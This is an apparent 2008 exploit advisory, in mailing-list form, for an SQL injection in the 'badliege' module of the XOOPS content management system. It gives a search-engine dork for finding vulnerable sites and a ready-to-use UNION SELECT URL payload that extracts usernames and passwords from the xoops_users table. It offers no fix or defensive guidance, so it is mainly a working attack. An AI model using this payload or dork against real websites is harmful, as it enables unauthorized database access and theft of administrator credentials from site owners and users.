XOOPS Module badliege SQL Injection
Date: 19 Feb 2008 16:30:54 -0000
From: [email protected]
To: [email protected]
Subject: XOOPS Module badliege SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
###############################################################
#
# XOOPS Module badliege SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : [email protected]
#
################################################################
#
# DORK 1 : allinurl :"modules/badliege/index.php?op=show"
#
# DORK 2 : allinurl:
#
################################################################
EXPLOIT :
modules/badliege/index.php?op=show&id=-9999999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
